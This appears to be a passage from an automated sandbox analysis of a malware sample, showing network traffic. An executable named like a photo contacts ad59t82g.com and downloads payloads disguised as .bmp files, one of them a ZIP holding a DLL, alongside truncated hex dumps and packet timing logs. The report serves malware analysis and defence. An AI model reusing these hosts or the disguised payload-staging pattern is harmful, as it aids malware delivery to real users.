                                                              Sep 20, 2024 12:00:39.408288956 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.408305883 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.408339024 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.409260035 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.409276962 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.409291983 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.409307957 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.409317017 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.409349918 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.410197973 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.410216093 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.410239935 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.410249949 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.410283089 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.411140919 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.411158085 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.411171913 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.411205053 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.412034035 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.412050962 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.412065029 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:39.412096024 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:39.412134886 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:40.478544950 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:40.483525038 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:40.483608007 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:42.429915905 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:46.058562040 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:46.063632011 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:46.063703060 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:46.063734055 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:46.064316034 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:46.597280025 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:46.598001957 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:46.603094101 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:57.398477077 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:57.403609037 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:57.713788033 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:57.757713079 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:57.785392046 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:57.790683985 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:01:13.929739952 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:01:13.934932947 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:01:14.244823933 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:01:14.303379059 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:01:14.327188015 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:01:14.332608938 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:01:30.086055040 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:01:30.090996981 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:01:30.401130915 CEST8049727202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:01:30.445123911 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:01:30.497745037 CEST4972780192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:01:30.502667904 CEST8049727202.79.173.4192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 20, 2024 12:00:03.104088068 CEST5690153192.168.2.51.1.1.1
                                                              Sep 20, 2024 12:00:03.120630980 CEST53569011.1.1.1192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 20, 2024 12:00:03.104088068 CEST192.168.2.51.1.1.10x981cStandard query (0)ad59t82g.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 20, 2024 12:00:03.120630980 CEST1.1.1.1192.168.2.50x981cNo error (0)ad59t82g.com104.21.22.88A (IP address)IN (0x0001)false
                                                              Sep 20, 2024 12:00:03.120630980 CEST1.1.1.1192.168.2.50x981cNo error (0)ad59t82g.com172.67.203.195A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • ad59t82g.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549723104.21.22.88807288C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 20, 2024 12:00:03.131304026 CEST73OUTGET /1/lon2.bmp HTTP/1.1
                                                              Host: ad59t82g.com
                                                              Cache-Control: no-cache
                                                              Sep 20, 2024 12:00:03.880932093 CEST1236INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:03 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 137736
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 12 Sep 2024 12:03:59 GMT
                                                              ETag: "66e2d8af-21a08"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: MISS
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BcYOpHU9q6o8dp%2Fz3ddE9TNognaETRod6IT061xuhlRwVIURgd8aNRhZWRVVXFvAPd9eiwCRdX41S3OLo1GmwLb8OstZhHyvYYxZSp1f1z9kNP2PNDigijelEp8qxE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f75e0cd17d14-EWR
                                                              Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 19 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED]
                                                              Data Ascii: ll4Ugnlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD$I0H|f($}fHllRt$llHllA
                                                              Sep 20, 2024 12:00:03.880951881 CEST224INData Raw: e8 48 84 00 6c 6c 88 84 48 e9 00 00 6c 0a c7 84 48 ea 00 00 6c 2a 75 88 f0 48 88 00 6c 6c c7 84 48 e5 00 00 6c 0f 74 69 03 e4 9c 24 e1 6c 00 00 0a ab 84 24 e2 6c 00 00 38 0d c6 84 48 fc 00 00 6c 0e 88 94 48 fd 00 00 6c 84 77 08 6c 6c b9 b5 2d b5
                                                              Data Ascii: HllHlHl*uHllHlti$l$l8HlHlwll-^kll$lljt$l4HlHlD$p<Hl\$X<UUj3D$(|HxDHtDHXPU($|$r<tHDbXf($D$zD$0D$t$l<9DHpPH(
                                                              Sep 20, 2024 12:00:03.880970001 CEST1236INData Raw: bf 06 15 58 0a e5 44 24 78 0a 89 44 48 7a 8d 84 48 f8 00 00 6c e5 44 24 74 e1 84 24 d4 6c 00 00 3c 39 8d 44 48 70 50 ff 18 48 28 ff bf 06 13 5e e1 28 24 6c 0a e5 74 24 78 e5 44 24 74 e1 84 24 a8 6c 00 00 3c 39 8d 44 48 70 66 89 18 48 1e 50 93 18
                                                              Data Ascii: XD$xDHzHlD$t$l<9DHpPH(^($lt$xD$t$l<9DHpfHP$(j4DHxf(H(H<(HHllPU($<t$DHllfH(HHllPU($t$r<tHD($P|$xD$t$l<9DHpfHP$(9lHXlkU$lllU$lcll9
                                                              Sep 20, 2024 12:00:03.880985975 CEST1236INData Raw: 68 e7 0e 85 a5 18 06 8b 38 48 1c eb c4 e7 7c 24 40 ef 7c 24 54 6c 74 1c 5f ac 40 39 28 48 10 76 7f 05 84 24 54 6d 00 00 84 6f 00 00 3c 93 94 24 dc 6c 00 00 e7 2b 20 83 ab 78 89 7c 48 40 85 c0 63 e9 4c ff 93 93 8b 6c 48 44 83 bd 88 6c 00 00 6c 63
                                                              Data Ascii: h8H|$@|$Tlt_@9(Hv$Tmo<$l+ x|H@cLlHDllcllloDH|l$oPHll $`o>l[H0{ye:<j\n_T$TTtg,BVlu8$8:DHtf(H(HjlT$L<QRlt $lH|Ll
                                                              Sep 20, 2024 12:00:03.881000042 CEST1236INData Raw: 11 87 60 56 7f f1 fb 56 11 87 66 56 7f f1 fb 56 3e 05 63 68 7e f1 fb 56 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 3c 29 00 00 20 6d 04 00 61 b4 e2 66 6c 6c 00 00 6c 6c 00 00 8c 6c 02 21 67 6d 0a 00 6c 30 01 00 6c a2 00 00 6c 6c 00 00 a8 d0
                                                              Data Ascii: `VVfVV>ch~Vllllllll<) maflllll!gml0llll|llll|lnilllillll<lhllnl@lll|lll|ll|l|wx|llllllllllllll\~llllllllllllllll
                                                              Sep 20, 2024 12:00:03.881016016 CEST1236INData Raw: 6d 7c 6a 01 3f 3f ff b5 b0 9f ff ff 93 79 18 70 6d 7c 85 c0 18 7f ff b5 b0 9f ff ff 93 79 20 70 6d 7c 68 d8 f9 6d 10 eb a9 3f 8d 85 b0 9f ff ff 3c 3f 68 06 6c 6e 00 53 3f 3f 68 d4 f9 6d 10 56 93 bb 85 c0 18 6b 68 e0 f9 6d 10 eb cd 04 b8 00 6c 6c
                                                              Data Ascii: m|j??ypm|y pm|hm?<?hlnS??hmVkhmll/?<=;Q\Shh)x\Co`tMen$xdler0p\00 21X\H]A00(00A\@\\0-0C0\\XA\008
                                                              Sep 20, 2024 12:00:03.881031990 CEST1236INData Raw: 7c 84 79 23 6d 6c 6a 0c 84 2f 9e 00 6c e7 f0 59 e5 19 f0 83 09 90 00 85 9a 18 17 ff 19 64 83 66 68 6c c7 46 64 6d 00 00 6c 84 ca 8b 6c 6c 89 06 87 6e 33 f6 ef 21 fc ff e5 5b 85 f6 19 66 68 0e 6c 6b 80 e8 5c e1 00 00 e7 ab e8 cf 4f 6d 00 c2 68 6c
                                                              Data Ascii: |y#mlj/lYdfhlFdmllln3![fhlk\OmhljUj|!#mljlY)dfhlFdmlmju}UE`hlk_M7toOmhlV[t[F<m&"jtk<*Phl5VW5'2Q
                                                              Sep 20, 2024 12:00:03.881047010 CEST1236INData Raw: 84 23 fd ff 93 35 33 c0 e1 11 f1 ab c7 0a ab aa 5f ac 8d 7d c0 c7 ab 8d 29 9c 50 66 ab 29 f0 01 6d aa 45 f7 7c e5 5d f8 ab 29 b0 20 6c 6c 00 89 29 c0 ff 15 68 1c 01 10 ef ac 08 50 e1 29 ac 50 06 75 ff 75 a0 93 15 14 1c 6d 10 ff 19 a0 8b 3d 38 1c
                                                              Data Ascii: #53_})Pf)mE|]) ll)hP)Puum=8u)ll@mh-5;cllPSllm)clnl)Phmypp|ubuyTpm|Hnl)PW?)S)E?j))PS)llEnlmcnl
                                                              Sep 20, 2024 12:00:03.881062984 CEST1236INData Raw: e1 29 f4 50 e7 a3 e8 75 94 93 ff 59 e7 11 cc 8d 29 98 50 68 2c fb 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 56 f8 93 93 59 8b 11 a0 8d 45 98 3c 68 60 fb 6d 10 53 93 ba 85 c0 18 60 8d 45 98 3c 8b cf 84 5b f8 ff 93 35 8b 7d a0 e1 45 f4 3c 04
                                                              Data Ascii: )PuY)Ph,?)PVYE<h`mS`E<[5}E<tm|St`E<t5_3}E<f))1) llEmdP)Pjuuypm|u=Tmu@mh}5;cllPSllm)cgnl)P
                                                              Sep 20, 2024 12:00:03.881081104 CEST1000INData Raw: 93 e7 85 b0 90 93 ff 8b 64 e1 95 b4 90 93 ff 52 3f 3c ff 51 48 e7 85 b4 90 93 ff 8b 64 e1 95 9c 90 93 ff 52 3c 93 51 1c e1 29 d4 50 e1 d1 b8 fc 93 93 c7 45 b8 21 69 63 1e ab 45 d8 03 1f 6f 66 ab 29 dc 74 4c 2f 6f c7 29 8c 72 70 03 1e c7 45 88 0d
                                                              Data Ascii: dR?<QHdR<Q)PE!icEof)tL/o)rpEtiEr)lllWthn_P=R(ud><QPdP=8jm<Q$dR<Q,:<Q4d8R<ll
                                                              Sep 20, 2024 12:00:03.885979891 CEST1236INData Raw: 29 7c 57 89 e9 bc e7 ff 93 5f c0 68 92 6f 00 00 0a e5 85 f4 8b 93 ff 33 b7 e1 85 f6 8b 93 ff 53 3c e7 f1 e8 f0 f7 00 00 04 6c 14 00 6c e1 85 f4 87 93 ff 53 3c 84 8a 9b 6c 6c 6a 38 e1 e9 90 e7 93 93 53 50 84 17 9b 00 6c e1 85 f4 97 93 ff 89 e9 ac
                                                              Data Ascii: )|W_ho3S<llS<llj8SPlllHPl?VPlmS??j2:Syq|?


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549724104.21.22.88807288C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 20, 2024 12:00:04.317171097 CEST116OUTHEAD /1/text.bmp HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: Keep-Alive
                                                              Pragma: no-cache
                                                              Host: ad59t82g.com
                                                              Sep 20, 2024 12:00:05.429286957 CEST661INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:05 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 6443425
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                                              ETag: "66b4e505-6251a1"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: REVALIDATED
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uiOmlFWIkDIyzv8Hpwx2t81PKaDPIBvi%2FC%2Bl67Zs7VHKQ1ygbwGi1Hd68lN55aOTk7iuyEAVZwNYCpkEnDQJQW2rf%2F5F8%2FFLKa33b4e92NzaCQUNgmaNrxgEILMOpfw%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f7659fab72bc-EWR
                                                              Sep 20, 2024 12:00:05.429848909 CEST661INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:05 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 6443425
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                                              ETag: "66b4e505-6251a1"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: REVALIDATED
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uiOmlFWIkDIyzv8Hpwx2t81PKaDPIBvi%2FC%2Bl67Zs7VHKQ1ygbwGi1Hd68lN55aOTk7iuyEAVZwNYCpkEnDQJQW2rf%2F5F8%2FFLKa33b4e92NzaCQUNgmaNrxgEILMOpfw%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f7659fab72bc-EWR
                                                              Sep 20, 2024 12:00:05.432626963 CEST115OUTGET /1/text.bmp HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: Keep-Alive
                                                              Pragma: no-cache
                                                              Host: ad59t82g.com
                                                              Sep 20, 2024 12:00:05.540324926 CEST1236INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:05 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 6443425
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                                              ETag: "66b4e505-6251a1"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: HIT
                                                              Age: 0
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VHWmezBx%2BOtNnvU4z4qZf39f4sDyd60tyDPBRyCbupxva4FHq1BxK%2FxSluSEGPoY09aR8q4RGH9K6M0iA2KL7vQC7bNBS10e8Evdb83Kc6Ya9QvGYblq4TLTW21R1Ng%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f76a4af372bc-EWR
                                                              Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c [TRUNCATED]
                                                              Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,fRJU/wdv-
                                                              Sep 20, 2024 12:00:05.540395975 CEST224INData Raw: a3 8a 92 84 92 1d 04 c3 21 d5 41 3d 5c 5c 55 6e db e0 06 fc 85 66 0c f1 90 1a 88 35 63 60 37 93 5b 01 d5 74 bb 3a a9 99 4a 31 1f 93 12 2f 48 56 f1 b2 b3 25 aa cf 9c 36 49 00 8c fc 03 49 d1 ad 07 a1 ba 42 ff 65 e7 6a a1 22 12 da d9 c8 ec 3e bf bc
                                                              Data Ascii: !A=\\Unf5c`7[t:J1/HV%6IIBej">($|:Wb.wAx*BMX}bpk055^%wC ua}*:?u!j[0;!BidiF2T2mgC}R.2J7J$u)#o
                                                              Sep 20, 2024 12:00:05.540412903 CEST1236INData Raw: 6f e3 44 44 8b ce 07 24 f8 f2 50 1b 4f 54 7a 79 fa 44 c4 46 93 d7 53 35 9d 29 69 02 2a e2 2a 02 89 0c a6 b9 41 5c 0d 00 1a c1 5d 1f f2 74 a7 f0 ca b9 50 34 00 1b 52 b7 95 3b 4f e1 de 1c 5f 6b a3 46 0d bf 40 a3 d0 31 cf 1f bb 85 f6 03 6a 8b 61 bb
                                                              Data Ascii: oDD$POTzyDFS5)i**A\]tP4R;O_kF@1ja"<VmjeI*lO|sl"JXl8CxqR"eyt`6o8!E#uAS/VhqQ*4JN^;Qv3G7St5NEvy>t,$
                                                              Sep 20, 2024 12:00:05.540427923 CEST1236INData Raw: 9d 24 07 6a d5 36 41 82 de d6 ce 75 57 6c 73 11 5d ec 81 67 ca 2e 53 f9 60 04 06 9e bf 7f 9d e3 ea b1 c8 ed 58 22 4c c8 0b 47 6c 83 6d 54 53 e2 b6 25 bc d0 18 2b 02 35 79 a3 8f 42 a7 23 5c 9e 12 7a ad 1b eb 19 c2 15 d9 33 c6 9c 24 00 63 96 ee 8d
                                                              Data Ascii: $j6AuWls]g.S`X"LGlmTS%+5yB#\z3$cWCN0Kw3PmlZbM"o5qW-e $q89l*Nd]lFh0}Z^CTa2JoC*X_MpaRg:pE)CD
                                                              Sep 20, 2024 12:00:05.540442944 CEST448INData Raw: c7 bc f0 fc 32 15 9a 63 0f d6 5c a2 59 20 a1 c3 c6 76 dd 2c b9 bd c8 3c a7 ec 3d 0c b4 40 46 db 6e cb 09 a4 da b3 1f 63 d8 37 37 64 19 32 d0 35 24 b1 68 cc 69 ef 25 ce 03 e1 14 36 a5 9a 39 14 07 7c 77 e8 98 87 f4 a1 1a de db 08 ff 2c 31 61 21 05
                                                              Data Ascii: 2c\Y v,<=@Fnc77d25$hi%69|w,1a!qo,0Ek+zNz@.:(c+pf6f@0&"Ky>T0GbRcw-"r#u EnM#c5AiV
                                                              Sep 20, 2024 12:00:05.540457964 CEST1236INData Raw: 4b 8f e6 5d 51 d5 30 63 b2 54 61 a9 d3 39 ef b0 7c 83 01 e7 98 0d 91 85 43 4e 83 38 3f 41 81 fb cc 16 dd 2e 42 2f b2 69 7b 56 d7 55 6f 1a 79 a6 c1 a9 d9 ac 56 93 72 65 5a 73 fd 46 f5 b8 14 11 e5 bd 6c 6c a5 20 1e 6d fe d1 c2 93 d3 32 23 f1 a8 3a
                                                              Data Ascii: K]Q0cTa9|CN8?A.B/i{VUoyVreZsFll m2#:brR*w'psP2mOYF||\^D5k6F },mkmtu&PADr~@&x<s%A,@@{VhWRP,}8bm_
                                                              Sep 20, 2024 12:00:05.540474892 CEST1236INData Raw: 8e cf 15 c6 90 86 4d 0e 04 52 7a c1 20 1b f0 90 d7 cc 44 0f d1 eb f5 ff 3e dc 3f 53 e6 62 68 dd 81 d1 2f 90 46 00 ff 6b 30 a7 e4 95 32 cb bd 1f 8a e5 fe ed 82 53 08 e5 01 26 3f 19 88 2c bc 08 94 29 7b 4d 91 aa ce 42 cf da c0 a4 51 d4 ba 22 c0 d5
                                                              Data Ascii: MRz D>?Sbh/Fk02S&?,){MBQ"z3z)]sP*px_*o1N"9DPvt#lmcM]YPNxy'@Alk2$B]!eL}bq0rbh886Q&q3.6
                                                              Sep 20, 2024 12:00:05.540491104 CEST1236INData Raw: fb b5 f4 9b 60 da 68 9d 5f fc 0b 85 7e cc 04 51 d9 74 b6 b9 9e c6 e6 c4 8d e3 79 aa d8 ff 17 fe c1 5f 04 f8 26 b6 2e 89 f0 4d 1c 2c cf 85 a8 9b 8b 5b f0 35 1b 3c 4b 1d 28 8e 75 99 e8 4f 45 9a ac 96 4b 8c aa 6f 56 3d ce 63 bd 3f 0e 0e 85 9e b8 08
                                                              Data Ascii: `h_~Qty_&.M,[5<K(uOEKoV=c?.&*ln'MYi(/l6}IyL+#fm\(|}A(`W$v,}Ta<xXk?Nq6S_CqP`[z-
                                                              Sep 20, 2024 12:00:05.540509939 CEST1236INData Raw: 8e f3 ea 29 a1 3b 8a 57 8d d2 5d 53 ab 49 d0 81 f3 a7 aa 67 a6 eb e6 61 87 47 18 85 ca 6a 64 cd d5 91 19 1a 26 56 a0 24 34 d0 35 35 14 90 71 c7 b2 c7 f2 67 e0 4c e9 19 8d bc f6 d3 8b 24 22 bd a8 e9 e8 e1 c9 15 d6 78 c0 20 99 c2 7f e2 ff 22 54 8e
                                                              Data Ascii: );W]SIgaGjd&V$455qgL$"x "T55*i)$*(0it$IF&.,-ExHm=YryQ^$y62@Ohj6dSk[I3f[M[KjT/c f*(tJ~m
                                                              Sep 20, 2024 12:00:05.540527105 CEST328INData Raw: 34 74 7e f4 cb 75 bc 7d a9 da 3a ca d2 47 a5 ed 8d ce 07 8b 52 9f 3c cc 8b b9 08 db 8f bd ef 61 85 ff b3 39 cd 72 74 f4 3e ee b8 d2 f8 b5 12 81 c8 d4 2c b5 0e 7f 01 2d 35 ba af 2c 0b ef 3a 96 38 87 c3 59 1e ff c5 0c 8e 89 07 23 e7 83 60 3a 46 94
                                                              Data Ascii: 4t~u}:GR<a9rt>,-5,:8Y#`:FAX/A2,~Xf|8*b5PC-j!T.5O`U$/^Mh|,s?Bg3Ynf9 B_E`I/*hwJPxw
                                                              Sep 20, 2024 12:00:05.541400909 CEST1236INData Raw: 11 39 53 29 5f e4 72 ba e2 ab ce f7 3d 90 d3 6e 24 66 cc 4c ce c3 e5 ec 34 02 35 76 cd 9e 7d d8 fe 25 09 64 6d 4e 04 c1 43 65 ed 0b 53 d6 cd 36 3a 0a 28 93 e6 f0 d0 9d a0 3d 25 08 08 24 52 33 a1 09 66 5e e7 1d b6 f2 8d dd 38 1c 5c 12 60 78 11 9f
                                                              Data Ascii: 9S)_r=n$fL45v}%dmNCeS6:(=%$R3f^8\`x!(y"@IeB,DnBQ?DunCW<Tl(~/xR@R\HqQW||aKP-W59{cLDyBXeL1Ae4 Sz/7\P~jx\2J("gkfGk
                                                              Sep 20, 2024 12:00:12.210901976 CEST113OUTHEAD /1/d.bmp HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: Keep-Alive
                                                              Pragma: no-cache
                                                              Host: ad59t82g.com
                                                              Sep 20, 2024 12:00:12.455508947 CEST661INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:12 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 1236598
                                                              Connection: keep-alive
                                                              Last-Modified: Tue, 03 Sep 2024 17:12:42 GMT
                                                              ETag: "66d7438a-12de76"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: REVALIDATED
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=le0LiwkMJwSQ%2F3uc5ndFUDqZb2LsgBh%2BKbqm9bdFOx6Da6rT7I9RKH7OL3SUBOSZtzlDadaFU62A1HBoFAu%2B7tcsFI0kIcVF13fgJQOpzP2T7U3Mb4C%2B76hIC0LSXWM%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f794af5972bc-EWR
